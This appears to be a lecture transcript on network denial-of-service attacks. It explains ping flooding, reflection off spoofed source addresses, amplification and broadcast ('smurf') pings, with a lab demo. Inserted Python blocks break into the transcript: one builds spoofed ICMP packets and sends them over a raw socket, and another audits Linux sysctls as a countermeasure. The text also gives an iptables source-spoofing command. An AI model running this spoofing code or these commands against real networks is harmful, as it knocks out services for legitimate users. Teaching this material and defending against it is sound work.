We're looking at how a malicious user can overload some target to deny the normal users access to that target. Okay, so we've started going through some scenarios. We are looking at a simple ping flooding attack, where there's some target computer and the malicious user wants to stop people accessing that target computer. So the idea is that on one of the links leading to that target, especially the slowest link, or what we call the bottleneck link, try and send enough packets such that the capacity of that link is fully utilized. So that link has some capacity, that is, the data rate that it supports. If we send enough traffic into this link and use up that entire capacity, then the data from the normal users will not be able to pass through that link, or at least could be delayed a lot. Okay, so this depends upon a bottleneck link leading up to the target.

And with the ping flooding attack we use ping, which is a simple application: the source sends an ICMP echo request to some destination computer, and the normal behavior is that that destination replies with an ICMP echo reply. So the protocol used is ICMP. There's a request and a reply. That's the normal behavior of ping. So the idea of the attacker is to send many of these ping requests to the target, not worrying about the replies. We don't care about the replies. What we want to do is just send many ping requests to the target such that we overflow this link. We fill up the capacity.

Why use ping? Well, the idea is to be able to send data to some target such that, and we'll see later when we reflect off others, such that the one that we're sending to will actually respond, or that the data will get to that target. We'll have a look and see, well, why not use web browsing or sending to a website, why not use other protocols? So we'll look at what's the benefit of using ping when we look at the different attacks.

But the general idea: send enough data to overflow the link. And we got to a point of some variations. Well, one thing is, when we send our data, use a fake source address. There are different purposes of using a fake source address. One is to hide. So one way to stop or to recover from a denial of service attack is to find out who is doing the attack and take some action against them. The action may be blocking the data that they're sending somewhere, or maybe some legal action. If this is an attack on some company, then that company can take some legal action to try and stop it happening in the future. So if the attacker can try and hide themselves, then that makes stopping the attack in the future harder. So sending messages with a fake source address is one way to hide. But we'll also use a fake source address, or spoofed source address, to facilitate the attack, to make the attack more powerful. And how do we do that? We'll skip back to some slides where necessary.

This was an example where the attacker sends the ping messages and sets the fake source address such that (a) the target doesn't know where they come from, so to hide, and (b) such that the traffic doesn't all come back to the attacker and overflow the attacker's link. Okay, so it goes to others. So that was using a fake source address: the attacker sends a message, the target receives it and replies to others. But we'll move to a more powerful attack, in that we send the message to normal computers on the internet, so it's just some other random computers on the internet, with a fake source address where the source is that of the target.

So we send a ping echo request to this computer. This one receives it, and this one looks: "Okay, I just received a message and the source address was the target's IP address, therefore I will send a reply to the source." So I'll send a reply to the target. And the attacker sends similar pings, with this fake source address set to the target, to many computers on the internet, and they all reply with the ping reply to the target. So this is, we are reflecting the pings off these normal hosts in the internet, and this is a typical form of a denial of service attack.

Now, from the target's perspective, it doesn't know that it is under attack. Well, in the previous case, from the target's perspective, it's receiving pings from multiple different source addresses, because they have a fake source address, so it's hard to tell that it's under attack, because it's receiving pings from many different computers. And the same in this case: it's receiving pings from different computers, and in fact the ISP of the target is receiving the pings from many different locations, different paths across the internet. So it's quite hard to tell whether this is just normal users sending traffic or if it's the attack. Of course we can scale up: in this example we just use three, but use 300, 3,000, thousands of nodes across the internet to increase the magnitude of the data that comes into the target. So we bounce messages off normal hosts.

Now let's look at the applications that can do this before we look at a more detailed example. For this to work, this reflector attack, what do we need? We need these normal computers to be able to respond to the message that they receive. Now, first, these normal computers are not infected in any way. They don't necessarily have any virus or any malicious software on them. So they're not under control of the attacker.
They're just normal computers on the internet. Okay, so yet we need a protocol such that if we send a message to these normal computers, they will respond. Now, that limits the set of protocols that we can use in such an attack. If we were using, say, HTTP GET requests, we're trying to use web browsing as the protocol here: from the attacker's perspective, if they send a message to a web server, then how many normal computers in the internet run web servers? Not many. But most normal computers in the internet respond to ping requests, because it's a typical behavior of a computer that's built into the operating system: if you receive a ping request, you send a ping reply. Most computers do that, but not many computers run web servers. So that's why we use ping here, because most normal computers will respond. The attacker sends a message to them, they receive the message, so they respond. Now, I'm omitting information that we're going to cover later about firewalls and so on; we're assuming that they can be reached. So ping is very easy to use, because most computers will respond to it, whereas with other applications, web browsing, email and so on, not all computers will respond to an unsolicited message that they receive.

Remember, the goal is to overflow the capacity of the link to the target so that the normal traffic doesn't get to the target. How do we do that? Send to many different normal hosts so they all reflect to the target. So the more hosts the attacker sends to, the more is going to go to the target. So send to more hosts in the internet; that's how you increase the traffic to the target. Or the other way is to get these hosts to send a lot of data to the target. It's all about getting as many bits per second to the target as possible. How do we do that? Get more messages going to the target, and/or get those messages to be larger.

And some real attacks in the internet, denial of service attacks, try and take advantage of the fact that in some protocols the response will be larger than the request. That's what I'm trying to show in this diagram, and it's not necessarily with ping; it doesn't work well with ping, because in ping the request and the reply are about the same size. But in some protocols the request is small, let's say 50 bytes, but the reply is large, say 500 bytes. DNS is an example, and there are a few other examples here. The idea is that the attacker again sends a small request to these normal hosts on the internet. These normal hosts reply, and again we're using a fake source address, so they all reply to the target. But the idea is that the reply will be larger than the request, therefore increasing the amount of bytes that go to the target and making it easier for the attacker, because the attacker's network doesn't need to have so much capacity.

If you note, if the request and the reply are the same size, let's say the capacity of the link that we want to overload is one gigabit per second, then the attacker needs a link here that supports at least one gigabit per second, because the attacker needs to send out at one gigabit per second such that these will send in at one gigabit per second. But if the reply is larger than the request, then to send at one gigabit per second in, we don't necessarily have to send at one gigabit per second out, because we send at a small rate out, small messages, but these hosts that receive the request effectively amplify the data that's sent to the target. And this is called an amplification attack, or the concept is amplification. We amplify the amount of data going to the target, and that's common in real denial of service attacks.

Questions? So we just quickly look at some of the concepts, then go through a demo to see them work, and then return to a summary. Questions so far?

To download some data? Now remember, when we're bouncing off these normal hosts, for this to work these normal hosts must respond to the packet that they receive. Now, let's say my computer in the office is one of these normal hosts, and the attacker is trying to use it, to bounce off my computer and go to the target, some web server. Okay, then for this to work, my computer in the office, this one, must respond to the request that it receives. And similarly with all computers on the internet, like all normal computers: what do they normally respond to? Well, they usually respond to pings. That's why ping's a common protocol here. That is, most computers, when they receive a ping request, will respond. But if someone tries to get my computer to download some other file, to access some website...
Well, that's not so common. That is, to send a request and get mine to reply, you need my computer to be able to respond to that request, so there are only some protocols that it will do that for. Unless my computer is a web server: if my computer was a web server, and this sent a request for a web page, and then mine sent the web page in the response to the target, then that would work. But there's another problem with that approach, which is that with web browsing, the speed at which you send the response is usually not under control of the attacker, and it's because of the transport protocol used, which is TCP. Even though we may send many requests to the web server, the web server will not send at the maximum speed to the target. It will actually slow down depending upon the amount of capacity here.

So it turns out that the protocols that we can use for such an attack need two characteristics. They need these normal hosts to be able to respond, and second, usually they need to be using transport protocols which are not TCP. TCP has characteristics that it will slow down automatically if the capacity starts to get overloaded here. So protocols that use TCP are typically not used in such an attack, because if we use TCP and we were sending fast and this was trying to send fast to the target, TCP has built-in flow control mechanisms to slow down the sending rate if the capacity becomes full. You've studied flow control with me last semester. Remember the idea: make sure that the source doesn't send too fast to overflow the target. So TCP has such mechanisms, so it's not very useful for such an attack, because if we start sending too fast to the target, the source will automatically slow down. So the protocols that are successful in these attacks are ones which don't use TCP. Therefore they use either ICMP, like ping, or they use UDP. DNS, for example, uses UDP; some network management protocols use UDP. And the protocol or the application needs to work such that normal hosts on the internet will respond. Ping is one, but there are a few others as well.

Another form of amplification attack. In this case, let's come back to ping. We send one ping message to this one, and the attacker sends a ping request to another one and to another one. So let's say it sends three ping requests in parallel. But we have a feature of broadcast in the internet: we can send one message to a particular network, and if we use a special destination address, that message will be delivered to all hosts on that network. That's broadcast. So broadcast is this feature that you send one, so there's one from the source, but the message is delivered to all in some set, in some network. If we can take advantage of that, then the attack can be even more successful, and the concept is, again, more amplification.

Let's focus here. The attacker sends one ping request, not to a particular host on the internet, but to a special broadcast address, which really refers to all hosts on a particular subnet. And the way that this in theory works is that when you send a ping request to this special broadcast address, that one message is delivered to that subnet, and then the subnet delivers it to all the hosts on there. Therefore all hosts on this subnet receive the request, and then all of them reply to the fake source, which is the target. And we just send another ping to another subnet; that message is delivered to all hosts on that subnet, and then they all reply to the target. So this is again amplification, in that the attacker is sending just three messages, but what comes to the target is multiplied based upon the number of hosts in each subnet. That's the idea here. That only works in very special cases. There are usually some built-in mechanisms that will stop that from working, but let's have a look and see how we can do it on our small virtual network, and we'll see this one and see some of the other forms of attack.
So, last lecture we gave a quick demo, and we'll continue with that. Again, I'm using a virtual network, and I've added some more annotations here. There are eight nodes in our small network, our small internet. We have a target server; this is the one we want to overload. Overload in terms of we don't want others to be able to access it. Let's say it's a web server, it has a website, and we want to stop other users from accessing that website, or at least slow down their response time, so when they try and access it, it takes a long time to get a response. That's our aim as the attacker. This is the target server, computer eight. Node seven is a router. Forget about the rectangle, net C; this is just a switch, so think of this as the link between router and target, and this is our bottleneck link in this example. That is, we assume this link is the slowest in the whole internet, and that's the one we're trying to overload. Remember, we're not trying to overload the actual computer; we're trying to overload the link: send fast enough such that this link is fully utilized.

And I'm going to set this link to have a capacity of a hundred kilobits per second. Now, that's unrealistic; in a real network it will be much larger than that, but just for our demo, when we only have a few nodes, I'll artificially limit the capacity of this link from seven to eight to 100 kilobits per second. So anything that node seven receives that is destined to eight, the speed or the data rate at which it can send to eight is 100 kilobits per second. So our denial of service attack really needs to be able to send in at a rate larger than 100 kilobits per second. If we send in to seven at 50 kilobits per second, then the link will not be fully utilized, and other normal users' traffic will get to node eight. But if we send in to node seven at, say, 200 kilobits per second, then seven will be sending out at the maximum 100 kilobits per second, and the data from other users will either be delayed or dropped in being sent to node eight. So this is our bottleneck. The 100 kilobits per second is just chosen so I can demonstrate it with a few nodes. We'll see the effect in a moment.

Some reflector nodes: these are normal nodes. They're not infected; they're just normal nodes on the internet, and because we're using ping, they will respond to pings. They'll receive a ping and send a response to the source. Node three will also be a reflector, but in some demos we'll make it also act as a web browser, that is, the normal host that wants to access computer eight, just to demonstrate. In fact, in the first demo we'll use node three as the malicious user. Later we'll set this as a router and another malicious user, but for now, for the first demo, forget about one or two. Let's say we just have this subnet and the target, eight. We're going to use broadcast. The idea is node three is the malicious user. For this first case, it's going to send a ping request to a broadcast address instead of sending individually to four, five and six. So instead of sending three packets, it will send one packet to the special broadcast address, and this switch will take the role of taking that one packet, noticing the destination is broadcast, and therefore sending to everyone on the subnet. And then those that receive that broadcast will then reply to the target. That's our first attack.

So web browser, or node three, is the malicious one, just in this demo, so not node one. What have we got? Node three is our malicious node, node eight is our target, node seven is this router. Actually, we don't want node eight. What I want to show is that node three will send packets; nodes four, five and six at least should receive and then send to the target. So let's look. We're going to look at what node three does to initiate the attack. We'll look at, maybe let's say, node five and see what it receives. We will not look at what the target does. What we'll do is we'll look at the data coming into node seven and how much goes out.

Remember, the capacity here is 100 kilobits per second. We want to send enough data into seven such that the amount coming out reaches 100 kilobits per second. We want to fill up the capacity. So let's look at three, five and seven, for example. So I need to log in to node five, which has IP address 192.168.2.23. Let's just set this up first.

We need to set a fake source address on node three. What source address? So we're going to use a fake source address on node three. What's the source address, which node's address? Eight. Okay, so the idea again is to send a message, a ping, to the nodes in this network, and they will all reply to eight. So the source address needs to be that of eight. And the way to do it in this case, I need to remember, maybe I have to type it. iptables is just the firewall software; I have to remember what to type, and it allows us to change addresses of the packets that we generate. So normally we create a packet and the source address will be node three's address, but iptables will allow node three to change the source address. You don't need to understand the details of how that works right now. POSTROUTING means after we create it; anything that's ICMP; let's use some network address translation; and this is the main part: set the source address to, and it's wrapping around now, 192.168.3.31. No. Let's try. I need a password. Did I get it correct? Okay, no errors. So this is just the way to set the fake source address. It'd be a bit easier to see; we'll see that work in a moment.

Let's just do a simple ping to just one node. So I'm going to ping, just for a start, a single ping to node five, and five will respond to eight.
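The spoofed echo request that the demo produces with the iptables SNAT rule, built by hand as an added example (this is not code from the lecture). It constructs the IPv4 and ICMP headers with their checksums, using the demo's addresses (node 8, 192.168.3.31, as the forged source; node 5, 192.168.2.23, as the reflector) and a 972-byte payload, so the "972 bytes of data gives a 1000-byte packet" figure can be checked: 20 bytes of IPv4 header plus 8 bytes of ICMP header plus 972 bytes of payload. The ICMP identifier 0x1234 and the raw-socket sending function are assumptions of the example; sending needs root and is not exercised here.

```python
"""Build the spoofed ICMP echo request used in the reflection demo.

Added example, not the lecturer's code. The demo rewrites the source address
with iptables SNAT; here the packet is assembled by hand so the header
arithmetic behind "972 bytes of payload = 1000-byte packet" is visible.
Addresses are the ones used in the lecture demo; the ICMP id is an assumption.
"""
import socket
import struct

TARGET = "192.168.3.31"      # spoofed source: node 8, the host being attacked
REFLECTOR = "192.168.2.23"   # real destination: node 5, a normal host that will reply

IP_HEADER_LEN = 20           # IPv4 header without options
ICMP_HEADER_LEN = 8          # type, code, checksum, id, seq


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def icmp_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP type 8 (echo request) with the checksum filled in."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload


def ipv4_packet(src: str, dst: str, proto: int, body: bytes, ttl: int = 64) -> bytes:
    """Minimal IPv4 header (no options) around body, with header checksum."""
    total_len = IP_HEADER_LEN + len(body)
    ver_ihl = (4 << 4) | (IP_HEADER_LEN // 4)
    fields = [ver_ihl, 0, total_len, 0, 0, ttl, proto, 0,
              socket.inet_aton(src), socket.inet_aton(dst)]
    fields[7] = inet_checksum(struct.pack("!BBHHHBBH4s4s", *fields))
    return struct.pack("!BBHHHBBH4s4s", *fields) + body


def spoofed_ping(payload_len: int = 972, seq: int = 1) -> bytes:
    """Echo request to REFLECTOR that claims to come from TARGET (id 0x1234 assumed)."""
    icmp = icmp_echo_request(ident=0x1234, seq=seq, payload=bytes(payload_len))
    return ipv4_packet(TARGET, REFLECTOR, socket.IPPROTO_ICMP, icmp)


def payload_for_total(total_bytes: int) -> int:
    """Payload size (the ping -s value) that makes the IP packet total_bytes long."""
    return total_bytes - IP_HEADER_LEN - ICMP_HEADER_LEN


def parse(packet: bytes) -> dict:
    """Decode what a reflector sees: addresses, length, type, checksum validity."""
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    icmp_type = packet[ihl]
    return {
        "src": socket.inet_ntoa(packet[12:16]),
        "dst": socket.inet_ntoa(packet[16:20]),
        "total_len": total_len,
        "icmp_type": icmp_type,
        # a correct checksum field makes the recomputed sum come out as zero
        "ip_checksum_ok": inet_checksum(packet[:ihl]) == 0,
        "icmp_checksum_ok": inet_checksum(packet[ihl:]) == 0,
    }


def send_raw(packet: bytes, dst: str) -> None:
    """Hand the finished packet to the kernel unchanged (needs root; not run here)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    s.sendto(packet, (dst, 0))
    s.close()


if __name__ == "__main__":
    pkt = spoofed_ping()
    print(len(pkt), "bytes on the wire (IP total length)")
    print(parse(pkt))
```

A reflector that decodes this packet sees only the forged source, which is why it answers node 8 rather than node 3. The iptables rule in the demo performs the same rewrite inside the kernel on the packets that ping generates; from the lecturer's description it is of the form `iptables -t nat -A POSTROUTING -p icmp -j SNAT --to-source 192.168.3.31` (reconstructed from the spoken description, not shown verbatim in the lecture).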
Let's just see that work, and let's just make this so we can see. And on node five, what I'll do, just down the bottom, is run tcpdump. If it's too small, we'll eventually make sense of it. Run tcpdump so we can see, from node five's perspective, the packets coming in and out. I'll zoom in in a moment. And now let's start our ping. With ping we can set the interval of the ping. Let's say two per second, two packets per second, which is an interval between the pings that we send of 0.5 seconds. So every 0.5 seconds node three is going to send an echo request. And let's set the size of the request to 972 bytes. This magic number comes from the fact that when we add on headers, the total size will be 1,000 bytes, just to give a nice round number. And ping who? Ping which address? Node three pings node five. Okay, just for this first demo, that is, send a ping message to here; this one should reply to here. Node five is 2.23.

Zoom in a little bit. Okay, we're doing a ping, and even if you can't read the details, this is node five down the bottom. Every ping request it receives... I'll stop it. It receives a message; the way to read this: ICMP echo request from 3.31 to 2.23, and therefore the echo reply goes from node five, 2.23, to 3.31, and 3.31 is our target. So this is the reflection happening.

Are we overflowing? Did we overflow the target? No? Yes? Maybe? How do you know? Check. Let's calculate. In this case, let's say every packet is a thousand bytes. Okay, the ping request and reply are a thousand bytes, or approximately. Okay, we see; that's why I set 972, so one packet is a thousand bytes in length in this case. We were pinging from node three to node five at a rate of two packets per second. Two packets per second it sends to node five, and therefore node five will send to the target at a rate of two packets per second. Node five receives two pings per second; it replies with two pings per second. So how much data is being sent to the target? If we're sending two pings per second, and each ping is a thousand bytes, that's two thousand bytes per second being sent to the target. 2,000 bytes is 16,000 bits per second. Okay, bytes to bits. That is, the amount of data going to the target is 16 kilobits per second. But our capacity of the link here is a hundred kilobits per second. 16 should be no problem. It's not overflowing the capacity.

Rather than having to calculate that all the time, let's look on node seven and let's monitor what we receive. There's another program we'll use, called iptraf, to measure the traffic on node seven. It provides a simple graphical interface to monitor what comes in and out of this computer. And I'll just look. There are many different statistics; we'll look at the general interface statistics. We'll see why. For node seven there are four interfaces. Loopback: not important. Ethernet zero is just for this node to access the real internet; we're not going to use that. Ethernet one and two are the interfaces of interest. This is node seven; Ethernet one, eth1, this interface, is going to receive packets. And sorry, there's a mistake in this picture: this should be eth2 here. This should be eth2. eth2 is where it's sending to node eight. So think of input to eth1, output to eth2. So this is a two here. So this software will report for eth1 and eth2 how many kilobits per second: eth1 coming in, eth2 going out. Let's do our ping again and just check. So it's pinging. What do we get? 20 kilobits per second coming in, and out 27. It calculates every few seconds and keeps the average over some period of time. What did we say? One ping would be 16 kilobits per second. Okay, there are... what are there?
There may be some overheads, in either ARP happening... What else can the overhead be? The packet lengths... I can't think of any other overhead. So 16 kilobits per second is based upon our 1000-byte ping packet, but we have a little bit more in this case. It's a little bit more than I expected, but close enough to 16. Let's see. Remember, we need to get this up to 100 kilobits per second. eth2 can only send out at 100 kilobits per second; so far we don't have enough.

Let's now try a better attack. Before, we pinged a specific node. Now let's ping the special broadcast address. 192.168.2.255 is a special address which means send this message to everyone on this subnet. That is, node 3 sends this message; it sends across the link to the switch; the switch sees it's a special broadcast address, this .255 address, and then realizes, okay, I need to send a copy to everyone, and it will send a copy to everyone on this subnet: three, four, five, six, two and seven. They all receive a copy because they're on this subnet, and they will reply, and reply to the target. Let's try it.

I just realized the reason why it was at 25 is because we're logged in to node 5. I think I'll log out. Let's hope it works this time. Let the ping... do you want to ping to broadcast? ping normally doesn't let you. Okay? Why? Because it's commonly used for denial of service attacks. Well, sudo. Sorry, I forgot to include the -b option. Let's do it without sudo. -b means broadcast, and now it doesn't let me again. Now I'll use sudo. A warning. Now node 3 is sending a ping to this special broadcast address. We note node 5 is receiving it; you can see the request is being received and it's replying. How much traffic is going through node 7? eth1, coming in to node 7, is 80 kilobits per second. Coming out of node 7 to node 8, on eth2, is 64 kilobits per second. What's happening here? Anyone want to guess? That's right. Let's do the calculations to see. Again, what did we say?

We said that at two packets per second, two pings per second, each ping was 1,000 bytes, which means that for one ping being sent there is 2,000 bytes, or 16 kilobits per second, 16,000 bits every second, for one ping. What's happening in this case is that node 3 is sending a ping to the broadcast address. It goes to the switch; the switch realizes this message is destined to everyone on the subnet, and note the switch realizes that the source is 3.31. So it sends to everyone: it makes a copy and sends to everyone on the subnet, including four, seven, six, five and two, and three. In this case it actually sends back to three, because the source address is not that of three, it actually sends back to three. So this is the broadcast: send one, everyone receives. Now when node five receives, what does it do? It receives a ping request; it replies. And who does it reply to? The source, and the source was that of the target. So node five replies. It'll go to node seven, which will then send it on to node eight, because node seven is the router. It will send the ping reply, which then should send it to eight. Node six will do the same; it replies. Node four the same. Actually node three does as well: three receives the request, three sends on. In this case, the way that node two is set up as a router, it's configured that it will not reply to such ping requests, to a ping to a broadcast address. The operating system is set up so that the router will not reply. That's actually a security feature of the operating system, to not reply to those ping requests. We'll return to see why that's the case later, but two doesn't reply in this case. Similarly, seven is a router; it will not reply.

So what's coming into node seven? Look at the lines. There are four blue lines and one red line. So each ping generates 16 kilobits per second. So the red line is coming into seven at 16 kilobits per second, the requests. The replies from six, another 16 kilobits per second; that's 32 coming in. The replies from five, that's 48. If we add the replies from four, that's 64 kilobits per second, and the replies from three, that's 80 kilobits per second coming in. 80 coming in to node seven on eth1; on node seven we have 80 kilobits per second. What comes out? Actually, all those blue ones should come out; they're the replies. The red one is the request going to node seven, and because node seven is a router it would not respond, so it doesn't send anything out to node eight. Why is it coming out here? Because the source address was that of node eight. So there are how many kilobits per second going from seven to eight? How many kilobits per second on eth2, which is out of node seven? 64 kilobits per second. That's what we expect. Is that what we see? Yes. Okay, so the demo is working. In this one, coming in to node seven at a speed of 80 kilobits per second, because there's also requests coming in, and coming out at 64 kilobits per second. We care about the coming out, really: 64 kilobits per second, capacity 100. We haven't reached our capacity yet. How are we going to reach the capacity? How do we increase the amount that seven sends out to eight? Again, put on your black hats. What are you going to do to make the attack more effective? Again, more pings. We were sending two per second, that is, every half a second. Just reduce the interval. Let's send that. What do you want to send at? How many per second? 10? What's the minimum that you need? Well, remember, with four nodes sending, we don't have any more nodes, so we can't increase the number of nodes; we're going to have four sending. We need to reach 100 kilobits per second, so each of them should be sending at 25 kilobits per second. How do we achieve that?
Well, all right, let's try. What, five pings per second? That would be 5,000 bytes per second, which would be, sorry, yes, 5,000 bytes per second would be 40 kilobits per second. Five pings per second would be 40 kilobits per second, times four would be 160 kilobits per second coming in. Let's try it: five per second, that is, the interval is 0.2. Okay, five pings per second, sent to the broadcast address. All right, just on node five: it's receiving, should be five per second. What about node seven? eth1 is coming in to node seven. Remember, each one is sending at 40 kilobits per second; we actually have five coming in, around 200 kilobits per second coming in. But coming out from node seven to node eight, look at the amount being sent out. Because the capacity of the link is 100 kilobits per second, it cannot send any faster out, and our attack is successful. Well, at least we overflowed the link, because on the output link, eth2, from seven to eight, we're sending at 100 kilobits per second, approximately. That is the pings from node seven to eight. We've generated pings to fill up the bottleneck link of 100 kilobits per second, and that's our aim for the attack. Very easy in this case: just ping to the broadcast address and everyone responds to the target. Questions on how that one worked?

What if my capacity of this link was a megabit per second? What would you do, or how do you fill up and utilize that capacity? If the bottleneck link has a higher capacity, what do you need from the attacker's perspective? Send faster. Okay, send at a higher rate. So instead of two pings, five pings per second, 500 pings per second. Note that that requires some capacity from the source node, the attacker's perspective. So yes, we can send very fast, but that starts to use up the attacker's own resources. So yes, we can increase the sending rate. What else would enable an attack on the higher bottleneck link? Yeah, change the protocol. Okay.

How, I mean, what would the new protocol characteristics have? Like DNS? Because... okay, if we had a protocol such that we send a small request, everyone receives that request and then they reply, but the reply is much bigger than the request. Make the reply large, more bytes, increase the amount of data going to eight. So yes, a different protocol may enable us to do this amplification, by sending small requests, which requires just a small amount of resources from node three, but generates large replies, which again overflows. A different protocol would enable that. If we're stuck with ping, what do we need? What else? Not in this network, in general. Increase the number of nodes. If we had a larger subnet, okay, we just send one ping; it goes to everyone on the subnet. So let's say the subnet was, say, for SIT, one of the labs. Then there are 40 computers in the lab; you send one ping, all 40 computers reply and go to the target. So it's quite easy in fact in that case to send one message and get many to reply, using the broadcast feature. Let's stop this now.

Unfortunately for the attacker, using this feature of broadcast normally doesn't work in practice. Why? Because it's so easy to do a denial of service attack: send one message, everyone in the network replies. Most computer systems, most operating systems and network devices, block such a feature. They don't respond to a ping to the broadcast address. So, to set up this demo,
I had to modify my operating system parameters such that it would reply. By default these computers normally will not reply to such a ping request, because denial of service attacks are very easy if they do so. Normally routers will not allow a ping to a broadcast address, so this one will not send it out. And similarly, if it did send it out, these ones normally will not reply to such a ping request. So in theory it's very easy to do an attack, but because of that, in practice most devices will not let the broadcast message go out. So routers block these broadcast packets, and that happens in most cases. In our demo, in fact, I had to modify 3, 4, 5 and 6 such that they would reply to the ping request that was to a broadcast address. I could do that. Note that 2 and 7 didn't reply; they were routers. I don't have a way to modify the operating system to allow them to reply. It's built into the operating system: don't respond to them. So that's a countermeasure. So broadcast is a nice idea, but doesn't work much in practice. Okay. But what we can do, instead of using broadcast, is I can still ping 4, ping 5 and ping 6, and they will reply. Let's do that. But let's do it now and let's set node 1 to be our malicious... Coming back to broadcast: we did broadcast from node 3 to its subnet. It would be better if node 1 could send one broadcast message to this subnet. Again, in theory it's possible to send one ping; the destination is .2.255.
It will go to all of these, and all of these reply. If that was possible, someone out on the internet could send a ping message to the broadcast address for SIT; every computer in SIT would then reply to the target. If that was possible, a denial of service attack would be very easy. Therefore most devices do not allow such a message to pass through. So if I tried that, send a ping to the broadcast, this one would block it, say no, you can't do that. So that's why I had to do it from node 3, just for this demo. Let's then get node 1 to individually ping 3, ping 4, ping 5 and 6 in parallel, and all of them reply to 8. Let's go back. Node 3 is no longer our malicious node; node 1 is. Node 1 is going to be our malicious node now. For node 3, we need to remove this fake source address. It's back to a normal node. Delete this fake source address on node 3; we won't need node 3 at the moment. We need node 1, and let's give it a fake source address, same as before, and again to the address of the target, same as before. So node 3 is going to send packets, and it needs to send packets to 3, 4, 5 and 6 at the same time. So what you do is you just run ping in the normal mode, ping node 3, and then at the same time ping node 4 and 5 and 6. So to do that, actually you need to open up four different terminals. You can do it, but to make it a little bit easier I created a script that would do it automatically for us. So I created something called ping many, and it will ping as many nodes as I list. From memory it takes the parameters of the interval and the size. So let's use our same interval as before, size as we used in the previous one, and then we just set the destination addresses. So we want to ping .2.21, .2.22, .2.23 and .2.24, ping many nodes at once. And it runs, and it runs in the background, so we don't see any feedback, but we can see on node 7. Is it working?
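The "operating system parameters" the lecturer had to change on nodes 3 to 6 are, on Linux (assumed for the demo nodes), the `icmp_echo_ignore_broadcasts` sysctl: set to 1 a host ignores pings to a broadcast address, set to 0 it answers them and becomes a reflector. The audit below is an added check of mine, not part of the course material: it reads the live `/proc/sys` values, flags anything that makes a host usable the way the demo used nodes 3 to 6, and prints the `sysctl -w` commands that would put it right. It also covers `rp_filter`, the strict reverse-path check that, on a router, implements ingress filtering and would drop the packets node 1 sends with the target's address as source. The fake `/proc/sys` tree is constructed so the audit can run anywhere.

```python
import tempfile
from pathlib import Path

# Linux sysctls (files under /proc/sys) behind the two behaviours the demo relied
# on, with the value a host should have. Assumed: the demo nodes run Linux.
EXPECTED = {
    # 1 = ignore echo requests sent to a broadcast address (the usual default);
    # the lecturer set this to 0 on nodes 3..6 so one broadcast ping got four replies.
    "net/ipv4/icmp_echo_ignore_broadcasts": "1",
    # 1 = strict reverse-path check: drop a packet whose source address would not be
    # routed back out of the interface it arrived on. On a router this is ingress
    # filtering and catches the fake (target) source address the attacker uses.
    "net/ipv4/conf/all/rp_filter": "1",
}


def audit_sysctls(proc_sys: Path = Path("/proc/sys"), expected: dict = EXPECTED) -> dict:
    """For each knob: ("ok" | "weak" | "unknown", value read or None)."""
    report = {}
    for knob, want in expected.items():
        try:
            got = (proc_sys / knob).read_text().strip()
        except OSError:                      # not Linux, or not readable
            report[knob] = ("unknown", None)
            continue
        report[knob] = ("ok" if got == want else "weak", got)
    return report


def fix_commands(report: dict, expected: dict = EXPECTED) -> list:
    """sysctl -w commands that would correct every 'weak' finding."""
    return [f"sysctl -w {knob.replace('/', '.')}={expected[knob]}"
            for knob, (state, _) in report.items() if state == "weak"]


def make_fake_proc_sys(values: dict) -> Path:
    """Constructed /proc/sys look-alike so the audit can be exercised offline."""
    root = Path(tempfile.mkdtemp())
    for knob, value in values.items():
        (root / knob).parent.mkdir(parents=True, exist_ok=True)
        (root / knob).write_text(value + "\n")
    return root


if __name__ == "__main__":
    # How nodes 3..6 were configured for the demo (constructed values).
    demo = make_fake_proc_sys({"net/ipv4/icmp_echo_ignore_broadcasts": "0",
                               "net/ipv4/conf/all/rp_filter": "0"})
    for knob, finding in audit_sysctls(demo).items():
        print(knob, finding)
    for cmd in fix_commands(audit_sysctls(demo)):
        print(cmd)
    print("this host:", audit_sysctls())
```

The routers 2 and 7, which the lecturer could not make answer, are the other half of the same countermeasure: a router that does not forward directed broadcasts never delivers the ping to the subnet in the first place.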
Node 7 again. We're pinging four nodes, 3, 4, 5 and 6, and they're all replying to the target. Therefore coming into the router node 7 on eth1 is four times; we're doing two pings per second, four times 16 kilobits per second, 64, and coming out around 64 kilobits per second. Now we need more; we need to get up to 100. So as we did before, we just stop them and increase the rate, reduce the interval. Now those four pings are running in the background, so I need to stop them, and this is not so important, but I can kill them, interrupt those ping processes. If you don't understand this bit, that's okay. Stop the pings and, okay, we're back to zero. So nothing's being sent now. Remember we're trying to stop normal users from accessing server 8. That's our aim. We want to overflow our link so that no one else can access 8. So what I'm going to do is open a web browser on node 3. I've set up a small website on computer 8, and I'm going to visit the website, and then we'll see, when we do the ping, how the response time is for visiting the website. Now our nodes only have a command line, so I had to do some special setup to give Firefox access, and I've set up Firefox so I can access the website on node 8. I've created a website on 192.168.3.31. Let's try. It's a great website; it just has a few links to some different pages. Okay, so think of this as the browser on node 3. It actually is using node 3 and sending to the target 8, which is 192.168.3.31. So this is the website on the target. How's the response time? Click on a link. No worries. Okay, it's very fast. Loads an image. Okay. Go back. Now let's start our attack, but we have a different interval. An interval of 0.2 means five packets per second. Five times a thousand bytes is five thousand bytes per second, 40 kilobits per second from one node, but we're pinging four nodes.
